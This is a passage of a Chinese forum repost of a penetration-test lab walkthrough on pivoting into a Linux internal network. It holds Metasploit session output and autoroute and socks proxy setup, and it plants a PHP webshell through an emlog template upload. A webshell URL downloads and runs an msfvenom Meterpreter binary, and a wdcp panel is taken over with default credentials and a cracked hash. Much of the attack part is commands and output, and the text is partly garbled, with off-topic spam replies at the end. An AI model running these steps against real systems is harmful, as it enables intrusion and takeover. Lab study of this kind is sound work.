5.2.网卡路由信息获取msf5 exploit(multi/handler) > sessions -i 2[*] Starting interaction with 2...meterpreter > ifconfigInterface 1============Name : loHardware MAC : 00:00:00:00:00:00MTU : 65536Flags : UP,LOOPBACKIPv4 Address : 127.0.0.1IPv4 Netmask : 255.0.0.0IPv6 Address : ::1IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff::Interface 2============Name : ens33Hardware MAC : 00:0c:29:c7:f2:4fMTU : 1500Flags : UP,BROADCAST,MULTICASTIPv4 Address : 192.168.0.122IPv4 Netmask : 255.255.255.0IPv6 Address : fe80::973d:c7c9:d30d:8cb8IPv6 Netmask : ffff:ffff:ffff:ffff::Interface 3============Name : ens38Hardware MAC : 00:0c:29:c7:f2:59MTU : 1500Flags : UP,BROADCAST,MULTICASTIPv4 Address : 10.10.10.145IPv4 Netmask : 255.255.255.0IPv6 Address : fe80::3b3c:b923:c6aa:54c3IPv6 Netmask : ffff:ffff:ffff:ffff::meterpreter > run get_local_subnets[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.[!] Example: run post/multi/manage/autoroute OPTION=value [...]Local subnet: 10.10.10.0/255.255.255.0Local subnet: 192.168.0.0/255.255.255.0
5.3.查看 host 文件cat /etc/hosts
<img src="data:image/svg+xml,%3C%3Fxml version=1.0 encoding=UTF-8%3F%3E%3Csvg width=1px height=1px viewBox=0 0 1 1 version=1.1 xmlns=http://www.w3.org/2000/svg xmlns:xlink=http://www.w3.org/1999/xlink%3E%3Ctitle%3E%3C/title%3E%3Cg stroke=none stroke-width=1 fill=none fill-rule=evenodd fill-opacity=0%3E%3Cg transform=translate(-249.000000, -126.000000) fill=%23FFFFFF%3E%3Crect x=249 y=126 width=1 height=1%3E%3C/rect%3E%3C/g%3E%3C/g%3E%3C/svg%3E" style="width: 50%; margin-bottom: 20px;">
5.4.metasploit 设置代理进入内网meterpreter > run autoroute -s 10.10.10.0/24[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.[!] Example: run post/multi/manage/autoroute OPTION=value [...][*] Adding a route to 10.10.10.0/255.255.255.0...[+] Added route to 10.10.10.0/255.255.255.0 via 192.168.0.122 [*] Use the -p option to list all active routes
5.4.1.起步 sock4 模块msf5 exploit(multi/handler) > search sock4 [-] No results from searchmsf5 exploit(multi/handler) > use auxiliary/server/socks4amsf5 auxiliary(server/socks4a) >msf5 auxiliary(server/socks4a) > show optionsModule options (auxiliary/server/socks4a):Name Current Setting Required Description---- --------------- -------- -----------SRVHOST 0.0.0.0 yes The address to listen onSRVPORT 1080 yes The port to listen on.Auxiliary action: Name Description---- ----------- Proxy msf5 auxiliary(server/socks4a) > set SRVPORT 22333 SRVPORT => 22333msf5 auxiliary(server/socks4a) > exploit[*] Auxiliary module running as bac公斤round job 1.[*] Starting the socks4a proxy server
5.4.2.设置 proxychains3 代理进内网sudo vim /etc/proxychains.conf
<img src="data:image/svg+xml,%3C%3Fxml version=1.0 encoding=UTF-8%3F%3E%3Csvg width=1px height=1px viewBox=0 0 1 1 version=1.1 xmlns=http://www.w3.org/2000/svg xmlns:xlink=http://www.w3.org/1999/xlink%3E%3Ctitle%3E%3C/title%3E%3Cg stroke=none stroke-width=1 fill=none fill-rule=evenodd fill-opacity=0%3E%3Cg transform=translate(-249.000000, -126.000000) fill=%23FFFFFF%3E%3Crect x=249 y=126 width=1 height=1%3E%3C/rect%3E%3C/g%3E%3C/g%3E%3C/svg%3E" style="width: 50%; margin-bottom: 20px;">proxychains3 nmap -sT -Pn 10.10.10.144
<img src="data:image/svg+xml,%3C%3Fxml version=1.0 encoding=UTF-8%3F%3E%3Csvg width=1px height=1px viewBox=0 0 1 1 version=1.1 xmlns=http://www.w3.org/2000/svg xmlns:xlink=http://www.w3.org/1999/xlink%3E%3Ctitle%3E%3C/title%3E%3Cg stroke=none stroke-width=1 fill=none fill-rule=evenodd fill-opacity=0%3E%3Cg transform=translate(-249.000000, -126.000000) fill=%23FFFFFF%3E%3Crect x=249 y=126 width=1 height=1%3E%3C/rect%3E%3C/g%3E%3C/g%3E%3C/svg%3E" style="width: 50%; margin-bottom: 20px;">
5.5.对 www.ddd5.com 进行检测
<img src="data:image/svg+xml,%3C%3Fxml version=1.0 encoding=UTF-8%3F%3E%3Csvg width=1px height=1px viewBox=0 0 1 1 version=1.1 xmlns=http://www.w3.org/2000/svg xmlns:xlink=http://www.w3.org/1999/xlink%3E%3Ctitle%3E%3C/title%3E%3Cg stroke=none stroke-width=1 fill=none fill-rule=evenodd fill-opacity=0%3E%3Cg transform=translate(-249.000000, -126.000000) fill=%23FFFFFF%3E%3Crect x=249 y=126 width=1 height=1%3E%3C/rect%3E%3C/g%3E%3C/g%3E%3C/svg%3E" style="width: 50%; margin-bottom: 20px;">
发掘是 emlog 后台默认秘码 123456 就可登录 然则 用 proxychains3 不是很稳定。
5.5.1.设置浏览器代理拜访
<img src="data:image/svg+xml,%3C%3Fxml version=1.0 encoding=UTF-8%3F%3E%3Csvg width=1px height=1px viewBox=0 0 1 1 version=1.1 xmlns=http://www.w3.org/2000/svg xmlns:xlink=http://www.w3.org/1999/xlink%3E%3Ctitle%3E%3C/title%3E%3Cg stroke=none stroke-width=1 fill=none fill-rule=evenodd fill-opacity=0%3E%3Cg transform=translate(-249.000000, -126.000000) fill=%23FFFFFF%3E%3Crect x=249 y=126 width=1 height=1%3E%3C/rect%3E%3C/g%3E%3C/g%3E%3C/svg%3E" style="width: 50%; margin-bottom: 20px;">
<img src="data:image/svg+xml,%3C%3Fxml version=1.0 encoding=UTF-8%3F%3E%3Csvg width=1px height=1px viewBox=0 0 1 1 version=1.1 xmlns=http://www.w3.org/2000/svg xmlns:xlink=http://www.w3.org/1999/xlink%3E%3Ctitle%3E%3C/title%3E%3Cg stroke=none stroke-width=1 fill=none fill-rule=evenodd fill-opacity=0%3E%3Cg transform=translate(-249.000000, -126.000000) fill=%23FFFFFF%3E%3Crect x=249 y=126 width=1 height=1%3E%3C/rect%3E%3C/g%3E%3C/g%3E%3C/svg%3E" style="width: 50%; margin-bottom: 20px;">
5.5.2.后台拿 WEBSHELL
从网上下来一个 emlog 把带有后门文件的 php 设置打包好在 emlog 后台上传模板压缩包解压后就可 在模板名的目录生成一个 php 后门。
<img src="data:image/svg+xml,%3C%3Fxml version=1.0 encoding=UTF-8%3F%3E%3Csvg width=1px height=1px viewBox=0 0 1 1 version=1.1 xmlns=http://www.w3.org/2000/svg xmlns:xlink=http://www.w3.org/1999/xlink%3E%3Ctitle%3E%3C/title%3E%3Cg stroke=none stroke-width=1 fill=none fill-rule=evenodd fill-opacity=0%3E%3Cg transform=translate(-249.000000, -126.000000) fill=%23FFFFFF%3E%3Crect x=249 y=126 width=1 height=1%3E%3C/rect%3E%3C/g%3E%3C/g%3E%3C/svg%3E" style="width: 50%; margin-bottom: 20px;">
<img src="data:image/svg+xml,%3C%3Fxml version=1.0 encoding=UTF-8%3F%3E%3Csvg width=1px height=1px viewBox=0 0 1 1 version=1.1 xmlns=http://www.w3.org/2000/svg xmlns:xlink=http://www.w3.org/1999/xlink%3E%3Ctitle%3E%3C/title%3E%3Cg stroke=none stroke-width=1 fill=none fill-rule=evenodd fill-opacity=0%3E%3Cg transform=translate(-249.000000, -126.000000) fill=%23FFFFFF%3E%3Crect x=249 y=126 width=1 height=1%3E%3C/rect%3E%3C/g%3E%3C/g%3E%3C/svg%3E" style="width: 50%; margin-bottom: 20px;">
5.5.3.metasploit 生成正向连接sudo msfvenom -p linux/x86/meterpreter/bind_tcp LPORT=13777 -f elf >ddd5
上传到 host123 主机上。
<img src="data:image/svg+xml,%3C%3Fxml version=1.0 encoding=UTF-8%3F%3E%3Csvg width=1px height=1px viewBox=0 0 1 1 version=1.1 xmlns=http://www.w3.org/2000/svg xmlns:xlink=http://www.w3.org/1999/xlink%3E%3Ctitle%3E%3C/title%3E%3Cg stroke=none stroke-width=1 fill=none fill-rule=evenodd fill-opacity=0%3E%3Cg transform=translate(-249.000000, -126.000000) fill=%23FFFFFF%3E%3Crect x=249 y=126 width=1 height=1%3E%3C/rect%3E%3C/g%3E%3C/g%3E%3C/svg%3E" style="width: 50%; margin-bottom: 20px;">
拜访web url 执行http://www.ddd5.com/content/templates/moonsec/shell.php?cmd=wget%20http://10.10. 10.145/ddd5%20-o%20ddd5chmod 777 ddd5 执行 http://www.ddd5.com/content/templates/moonsec/shell.php?cmd=./ddd5
5.5.4.连接远程 SHELLmsf5 auxiliary(server/socks4a) > use exploit/multi/handlermsf5 exploit(multi/handler) > set payload linux/x86/meterpreter/bind_tcp payload => linux/x86/meterpreter/bind_tcpmsf5 exploit(multi/handler) > set RHOST 10.10.10.144 RHOST => 10.10.10.144exploit
正常的状况下是会连接上的 然则可能 centos 的关系有些代码错误 引起连接不上。
5.6.sock5 隧道代理穿透内网
运用 metasploit sock4a 代理在实质环境中不怎么稳定如有不稳定最好运用 rssock 代理穿透内网。
下载位置 https://nchc.dl.sourceforge.net/project/ssocks/ssocks-0.0.14.tar.gz
 kali host123 都需要进行编译生成文件 
下载完进行解压-tar -zxvf ssocks-0.0.14.tar.gz cd ssocks-0.0.14./configuire && make
kali上执行./rcsocks -l 2233 -p 1080 -vv
<img src="data:image/svg+xml,%3C%3Fxml version=1.0 encoding=UTF-8%3F%3E%3Csvg width=1px height=1px viewBox=0 0 1 1 version=1.1 xmlns=http://www.w3.org/2000/svg xmlns:xlink=http://www.w3.org/1999/xlink%3E%3Ctitle%3E%3C/title%3E%3Cg stroke=none stroke-width=1 fill=none fill-rule=evenodd fill-opacity=0%3E%3Cg transform=translate(-249.000000, -126.000000) fill=%23FFFFFF%3E%3Crect x=249 y=126 width=1 height=1%3E%3C/rect%3E%3C/g%3E%3C/g%3E%3C/svg%3E" style="width: 50%; margin-bottom: 20px;">
在反弹shell里执行
位置于host123目录下./rssocks -vv -s 192.168.0.109:1080
运用浏览器代理
<img src="data:image/svg+xml,%3C%3Fxml version=1.0 encoding=UTF-8%3F%3E%3Csvg width=1px height=1px viewBox=0 0 1 1 version=1.1 xmlns=http://www.w3.org/2000/svg xmlns:xlink=http://www.w3.org/1999/xlink%3E%3Ctitle%3E%3C/title%3E%3Cg stroke=none stroke-width=1 fill=none fill-rule=evenodd fill-opacity=0%3E%3Cg transform=translate(-249.000000, -126.000000) fill=%23FFFFFF%3E%3Crect x=249 y=126 width=1 height=1%3E%3C/rect%3E%3C/g%3E%3C/g%3E%3C/svg%3E" style="width: 50%; margin-bottom: 20px;">
<img src="data:image/svg+xml,%3C%3Fxml version=1.0 encoding=UTF-8%3F%3E%3Csvg width=1px height=1px viewBox=0 0 1 1 version=1.1 xmlns=http://www.w3.org/2000/svg xmlns:xlink=http://www.w3.org/1999/xlink%3E%3Ctitle%3E%3C/title%3E%3Cg stroke=none stroke-width=1 fill=none fill-rule=evenodd fill-opacity=0%3E%3Cg transform=translate(-249.000000, -126.000000) fill=%23FFFFFF%3E%3Crect x=249 y=126 width=1 height=1%3E%3C/rect%3E%3C/g%3E%3C/g%3E%3C/svg%3E" style="width: 50%; margin-bottom: 20px;">
拜访速度有显著的提高
5.7.配置 proxychains3sock5 代理调用nmap 扫描
编辑配置文件sudo vim /etc/proxychains.conf
<img src="data:image/svg+xml,%3C%3Fxml version=1.0 encoding=UTF-8%3F%3E%3Csvg width=1px height=1px viewBox=0 0 1 1 version=1.1 xmlns=http://www.w3.org/2000/svg xmlns:xlink=http://www.w3.org/1999/xlink%3E%3Ctitle%3E%3C/title%3E%3Cg stroke=none stroke-width=1 fill=none fill-rule=evenodd fill-opacity=0%3E%3Cg transform=translate(-249.000000, -126.000000) fill=%23FFFFFF%3E%3Crect x=249 y=126 width=1 height=1%3E%3C/rect%3E%3C/g%3E%3C/g%3E%3C/svg%3E" style="width: 50%; margin-bottom: 20px;">proxychains3 nmap -sT -Pn 10.10.10.144
<img src="data:image/svg+xml,%3C%3Fxml version=1.0 encoding=UTF-8%3F%3E%3Csvg width=1px height=1px viewBox=0 0 1 1 version=1.1 xmlns=http://www.w3.org/2000/svg xmlns:xlink=http://www.w3.org/1999/xlink%3E%3Ctitle%3E%3C/title%3E%3Cg stroke=none stroke-width=1 fill=none fill-rule=evenodd fill-opacity=0%3E%3Cg transform=translate(-249.000000, -126.000000) fill=%23FFFFFF%3E%3Crect x=249 y=126 width=1 height=1%3E%3C/rect%3E%3C/g%3E%3C/g%3E%3C/svg%3E" style="width: 50%; margin-bottom: 20px;">
5.8.sockscap 本地理学代理穿透内网
<img src="data:image/svg+xml,%3C%3Fxml version=1.0 encoding=UTF-8%3F%3E%3Csvg width=1px height=1px viewBox=0 0 1 1 version=1.1 xmlns=http://www.w3.org/2000/svg xmlns:xlink=http://www.w3.org/1999/xlink%3E%3Ctitle%3E%3C/title%3E%3Cg stroke=none stroke-width=1 fill=none fill-rule=evenodd fill-opacity=0%3E%3Cg transform=translate(-249.000000, -126.000000) fill=%23FFFFFF%3E%3Crect x=249 y=126 width=1 height=1%3E%3C/rect%3E%3C/g%3E%3C/g%3E%3C/svg%3E" style="width: 50%; margin-bottom: 20px;">
用 metasploit sock4a 代理进的时候菜刀和蚁剑都链接不上后门此刻将菜刀代理进去功能正常
<img src="data:image/svg+xml,%3C%3Fxml version=1.0 encoding=UTF-8%3F%3E%3Csvg width=1px height=1px viewBox=0 0 1 1 version=1.1 xmlns=http://www.w3.org/2000/svg xmlns:xlink=http://www.w3.org/1999/xlink%3E%3Ctitle%3E%3C/title%3E%3Cg stroke=none stroke-width=1 fill=none fill-rule=evenodd fill-opacity=0%3E%3Cg transform=translate(-249.000000, -126.000000) fill=%23FFFFFF%3E%3Crect x=249 y=126 width=1 height=1%3E%3C/rect%3E%3C/g%3E%3C/g%3E%3C/svg%3E" style="width: 50%; margin-bottom: 20px;">
5.9.设置中国蚁剑 sock5 代理进穿透内网
<img src="data:image/svg+xml,%3C%3Fxml version=1.0 encoding=UTF-8%3F%3E%3Csvg width=1px height=1px viewBox=0 0 1 1 version=1.1 xmlns=http://www.w3.org/2000/svg xmlns:xlink=http://www.w3.org/1999/xlink%3E%3Ctitle%3E%3C/title%3E%3Cg stroke=none stroke-width=1 fill=none fill-rule=evenodd fill-opacity=0%3E%3Cg transform=translate(-249.000000, -126.000000) fill=%23FFFFFF%3E%3Crect x=249 y=126 width=1 height=1%3E%3C/rect%3E%3C/g%3E%3C/g%3E%3C/svg%3E" style="width: 50%; margin-bottom: 20px;">
<img src="data:image/svg+xml,%3C%3Fxml version=1.0 encoding=UTF-8%3F%3E%3Csvg width=1px height=1px viewBox=0 0 1 1 version=1.1 xmlns=http://www.w3.org/2000/svg xmlns:xlink=http://www.w3.org/1999/xlink%3E%3Ctitle%3E%3C/title%3E%3Cg stroke=none stroke-width=1 fill=none fill-rule=evenodd fill-opacity=0%3E%3Cg transform=translate(-249.000000, -126.000000) fill=%23FFFFFF%3E%3Crect x=249 y=126 width=1 height=1%3E%3C/rect%3E%3C/g%3E%3C/g%3E%3C/svg%3E" style="width: 50%; margin-bottom: 20px;">
<img src="data:image/svg+xml,%3C%3Fxml version=1.0 encoding=UTF-8%3F%3E%3Csvg width=1px height=1px viewBox=0 0 1 1 version=1.1 xmlns=http://www.w3.org/2000/svg xmlns:xlink=http://www.w3.org/1999/xlink%3E%3Ctitle%3E%3C/title%3E%3Cg stroke=none stroke-width=1 fill=none fill-rule=evenodd fill-opacity=0%3E%3Cg transform=translate(-249.000000, -126.000000) fill=%23FFFFFF%3E%3Crect x=249 y=126 width=1 height=1%3E%3C/rect%3E%3C/g%3E%3C/g%3E%3C/svg%3E" style="width: 50%; margin-bottom: 20px;">
6. linux 内网跨段提权
6.1.查看端口信息
<img src="data:image/svg+xml,%3C%3Fxml version=1.0 encoding=UTF-8%3F%3E%3Csvg width=1px height=1px viewBox=0 0 1 1 version=1.1 xmlns=http://www.w3.org/2000/svg xmlns:xlink=http://www.w3.org/1999/xlink%3E%3Ctitle%3E%3C/title%3E%3Cg stroke=none stroke-width=1 fill=none fill-rule=evenodd fill-opacity=0%3E%3Cg transform=translate(-249.000000, -126.000000) fill=%23FFFFFF%3E%3Crect x=249 y=126 width=1 height=1%3E%3C/rect%3E%3C/g%3E%3C/g%3E%3C/svg%3E" style="width: 50%; margin-bottom: 20px;">
6.2.用户信息
<img src="data:image/svg+xml,%3C%3Fxml version=1.0 encoding=UTF-8%3F%3E%3Csvg width=1px height=1px viewBox=0 0 1 1 version=1.1 xmlns=http://www.w3.org/2000/svg xmlns:xlink=http://www.w3.org/1999/xlink%3E%3Ctitle%3E%3C/title%3E%3Cg stroke=none stroke-width=1 fill=none fill-rule=evenodd fill-opacity=0%3E%3Cg transform=translate(-249.000000, -126.000000) fill=%23FFFFFF%3E%3Crect x=249 y=126 width=1 height=1%3E%3C/rect%3E%3C/g%3E%3C/g%3E%3C/svg%3E" style="width: 50%; margin-bottom: 20px;">
6.3.wdcp 主机提权
8080 端口是一个 wdcp 主机在旧版 wdcp 安装都是有些默认信息。
账号 admin 秘码 wdlinux.cn
主机登录的默认秘码被修改了 然则 mysql 的默认秘码还没修改 能够经过 phpmyadmin 进行登录。
<img src="data:image/svg+xml,%3C%3Fxml version=1.0 encoding=UTF-8%3F%3E%3Csvg width=1px height=1px viewBox=0 0 1 1 version=1.1 xmlns=http://www.w3.org/2000/svg xmlns:xlink=http://www.w3.org/1999/xlink%3E%3Ctitle%3E%3C/title%3E%3Cg stroke=none stroke-width=1 fill=none fill-rule=evenodd fill-opacity=0%3E%3Cg transform=translate(-249.000000, -126.000000) fill=%23FFFFFF%3E%3Crect x=249 y=126 width=1 height=1%3E%3C/rect%3E%3C/g%3E%3C/g%3E%3C/svg%3E" style="width: 50%; margin-bottom: 20px;">
<img src="data:image/svg+xml,%3C%3Fxml version=1.0 encoding=UTF-8%3F%3E%3Csvg width=1px height=1px viewBox=0 0 1 1 version=1.1 xmlns=http://www.w3.org/2000/svg xmlns:xlink=http://www.w3.org/1999/xlink%3E%3Ctitle%3E%3C/title%3E%3Cg stroke=none stroke-width=1 fill=none fill-rule=evenodd fill-opacity=0%3E%3Cg transform=translate(-249.000000, -126.000000) fill=%23FFFFFF%3E%3Crect x=249 y=126 width=1 height=1%3E%3C/rect%3E%3C/g%3E%3C/g%3E%3C/svg%3E" style="width: 50%; margin-bottom: 20px;">
管理员的密文 17d03da6474ce8beb13b01e79f789e63 
破解出来是 moonsec123
登录掌控面板提权
<img src="data:image/svg+xml,%3C%3Fxml version=1.0 encoding=UTF-8%3F%3E%3Csvg width=1px height=1px viewBox=0 0 1 1 version=1.1 xmlns=http://www.w3.org/2000/svg xmlns:xlink=http://www.w3.org/1999/xlink%3E%3Ctitle%3E%3C/title%3E%3Cg stroke=none stroke-width=1 fill=none fill-rule=evenodd fill-opacity=0%3E%3Cg transform=translate(-249.000000, -126.000000) fill=%23FFFFFF%3E%3Crect x=249 y=126 width=1 height=1%3E%3C/rect%3E%3C/g%3E%3C/g%3E%3C/svg%3E" style="width: 50%; margin-bottom: 20px;">
在掌控面板中能够直接执行命令
<img src="data:image/svg+xml,%3C%3Fxml version=1.0 encoding=UTF-8%3F%3E%3Csvg width=1px height=1px viewBox=0 0 1 1 version=1.1 xmlns=http://www.w3.org/2000/svg xmlns:xlink=http://www.w3.org/1999/xlink%3E%3Ctitle%3E%3C/title%3E%3Cg stroke=none stroke-width=1 fill=none fill-rule=evenodd fill-opacity=0%3E%3Cg transform=translate(-249.000000, -126.000000) fill=%23FFFFFF%3E%3Crect x=249 y=126 width=1 height=1%3E%3C/rect%3E%3C/g%3E%3C/g%3E%3C/svg%3E" style="width: 50%; margin-bottom: 20px;">
6.4.最后一个 flag
<img src="data:image/svg+xml,%3C%3Fxml version=1.0 encoding=UTF-8%3F%3E%3Csvg width=1px height=1px viewBox=0 0 1 1 version=1.1 xmlns=http://www.w3.org/2000/svg xmlns:xlink=http://www.w3.org/1999/xlink%3E%3Ctitle%3E%3C/title%3E%3Cg stroke=none stroke-width=1 fill=none fill-rule=evenodd fill-opacity=0%3E%3Cg transform=translate(-249.000000, -126.000000) fill=%23FFFFFF%3E%3Crect x=249 y=126 width=1 height=1%3E%3C/rect%3E%3C/g%3E%3C/g%3E%3C/svg%3E" style="width: 50%; margin-bottom: 20px;">
6.5.ssh公钥免密登陆
在 wdcp 生成秘钥保留下来
在 kali 设置权限 600proxychains3 ssh root@10.10.10.144 -i sshkey_wdcp
<img src="data:image/svg+xml,%3C%3Fxml version=1.0 encoding=UTF-8%3F%3E%3Csvg width=1px height=1px viewBox=0 0 1 1 version=1.1 xmlns=http://www.w3.org/2000/svg xmlns:xlink=http://www.w3.org/1999/xlink%3E%3Ctitle%3E%3C/title%3E%3Cg stroke=none stroke-width=1 fill=none fill-rule=evenodd fill-opacity=0%3E%3Cg transform=translate(-249.000000, -126.000000) fill=%23FFFFFF%3E%3Crect x=249 y=126 width=1 height=1%3E%3C/rect%3E%3C/g%3E%3C/g%3E%3C/svg%3E" style="width: 50%; margin-bottom: 20px;">
其他的有些思路能够参考公众号之前的文案
pdf版：
https://www.liuk3r.com/wp-content/uploads/2020/06/2020061105042629.pdf
结尾：友情文案跟友情宣传更搭配，点击原文直达培训网址
暗月web安全培训：http://edu.moonsec.com/

1fy07h 发表于 2024-10-6 15:47:05

说得好啊！我在外链论坛打滚这么多年，所谓阅人无数，就算没有见过猪走路，也总明白猪肉是啥味道的。

nykek5i 发表于 2024-10-28 21:09:20

论坛的成果是显著的，但我们不能因为成绩而沾沾自喜。

页: [1]

外链论坛's Archiver

linux 内网完整渗透测试靶机实例